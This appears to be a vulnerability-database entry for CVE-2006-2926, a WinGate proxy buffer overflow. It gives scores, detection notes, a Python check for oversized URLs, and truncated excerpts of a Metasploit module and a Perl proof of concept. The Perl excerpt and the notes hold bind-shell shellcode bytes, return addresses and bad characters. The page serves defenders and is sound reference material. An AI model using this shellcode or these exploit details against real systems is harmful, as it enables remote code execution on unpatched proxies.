CVE-2006-2926
Published 2006-06-09
Priority P3 · 58 · high · CVSS 2.0: 7.5
AV:N/AC:L/Au:N/C:P/I:P/A:P
EXPLOIT
EPSS: 70.91% (99.3th percentile)
Stack-based buffer overflow in the WWW Proxy Server of Qbik WinGate 6.1.1.1077 allows remote attackers to cause a denial of service and possibly execute arbitrary code via a long URL HTTP request.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| qbik | wingate | — | — |
Detection & IOCs (extracted from sources)
bytes:
\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36
- Fingerprint vulnerable WinGate instances by checking the Server banner in HTTP responses for the specific build string.
- Detect exploitation attempts by monitoring for anomalously long URLs in HTTP POST requests directed at the proxy service on port 80.
- The exploit payload uses AlphanumMixed encoding; look for large alphanumeric-only POST request bodies (~3000 bytes) to the proxy on port 80.
- The PoC exploit sends a POST request with ~2000+ bytes of padding followed by shellcode in the URL field; detect oversized HTTP POST URLs exceeding normal thresholds.
- The bind-shell shellcode in the PoC opens LPORT 4444; monitor for unexpected outbound/inbound connections on TCP/4444 from the WinGate proxy process.
- Caveat: the Metasploit return address (0x01991932 / call esi) is specific to WinGate 6.1.1.1077 only; the PoC return address (0x014f9e4b / JMP ESI) targets Win2k SP4 German specifically. Detections based on these values will not generalise to other OS/build combinations.
- Caveat: the exploit payload space is limited to 1000 bytes and bad characters include null bytes, whitespace, and several URL-special characters, meaning real-world payloads must be alphanumeric-encoded.
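A sketch of the oversized-URL check described in the notes above, as an added example that is not part of the indexed sources. The thresholds, function name and sample requests are assumptions constructed for illustration; tune the limits to the proxy's normal traffic.

```python
import re

# Assumed thresholds (not from the page): tune to the proxy's normal traffic.
MAX_TARGET_LEN = 1024   # request-targets longer than this are flagged
MIN_ALNUM_RUN = 512     # unbroken [A-Za-z0-9] run treated as encoded padding/payload

REQUEST_LINE = re.compile(rb"^([A-Z]+) (\S+)(?: HTTP/\d\.\d)?\r?$")
ALNUM_RUN = re.compile(rb"[A-Za-z0-9]+")


def inspect_request(raw: bytes) -> list[str]:
    """Return the reasons a raw proxy request looks like an oversized-URL attempt."""
    first_line = raw.split(b"\n", 1)[0]
    match = REQUEST_LINE.match(first_line)
    if match is None:
        return ["unparseable request line"]
    method, target = match.groups()
    reasons = []
    if len(target) > MAX_TARGET_LEN:
        reasons.append(f"{method.decode()} target is {len(target)} bytes")
    # A long query string is common; a long run with no separators is not.
    longest = max((len(run) for run in ALNUM_RUN.findall(target)), default=0)
    if longest >= MIN_ALNUM_RUN:
        reasons.append(f"alphanumeric run of {longest} bytes in target")
    return reasons


# Constructed sample requests (inert filler only, no payload bytes).
BENIGN = b"POST http://example.com/login HTTP/1.1\r\nHost: example.com\r\n\r\n"
LONG_QUERY = (b"GET http://example.com/search?" + b"k=v&" * 300
              + b" HTTP/1.1\r\n\r\n")
OVERSIZED = b"POST http://" + b"A" * 2000 + b"/ HTTP/1.0\r\n\r\n"

if __name__ == "__main__":
    for name, req in (("benign", BENIGN), ("long_query", LONG_QUERY),
                      ("oversized", OVERSIZED)):
        print(name, inspect_request(req))
```

Requiring both conditions before alerting separates a long but ordinary query string from the separator-free padding the notes describe.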
No detection rules found.
Exploit-DB
QBik WinGate WWW Proxy Server - URL Processing Overflow (Metasploit)
exploitdb·2010-09-20
---
##
# $Id: qbik_wingate_wwwproxy.rb 10394 2010-09-20 08:06:27Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'Qbik WinGate WWW Proxy Server URL Processing Overflow',
'Description' => %q{
This module exploits a stack buffer overflow in Qbik WinGate version
6.1.1.1077 and earlier. By sending malformed HTTP POST URL to the
HTTP proxy service on port 80, a remote attacker could overflow
a buffer and execute arbitrary code.
},
'Author' => 'patrick',
'License' => MSF
Exploit-DB
QBik WinGate WWW Proxy Server 6.1.1.1077 - 'POST' Remote Buffer Overflow
exploitdb·2006-06-07
---
### *** Proof of concept (not for "in the wild" kiddies) ***
### QBik Wingate version 6.1.1.1077 remote exploit for Win2k SP4 (german)
### by kcope in 2006
###
use IO::Socket;
if ($ARGV[0] eq "")
{
print "param1 = remote host";
exit;
}
# win32_bind - EXITFUNC=seh LPORT=4444 Size=709 Encoder=PexAlphaNum http://metasploit.com
my $shellcode =
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49".
"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36".
"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34".
"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41".
"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4c\x36\x4b\x4e".
"\x4d\x44\x4a\x4e\x49\x4f\x4f\x4f\x4f
Metasploit
Qbik WinGate WWW Proxy Server URL Processing Overflow
metasploit
This module exploits a stack buffer overflow in Qbik WinGate version 6.1.1.1077 and earlier. By sending a malformed HTTP POST URL to the HTTP proxy service on port 80, a remote attacker could overflow a buffer and execute arbitrary code.
No writeups or analysis indexed.
References
- http://lists.grok.org.uk/pipermail/full-disclosure/2006-June/046646.html
- http://lists.grok.org.uk/pipermail/full-disclosure/2006-June/046649.html
- http://secunia.com/advisories/20483
- http://securitytracker.com/id?1016239
- http://www.securityfocus.com/bid/18312
- http://www.vupen.com/english/advisories/2006/2182
- https://exchange.xforce.ibmcloud.com/vulnerabilities/26970
Published: 2006-06-09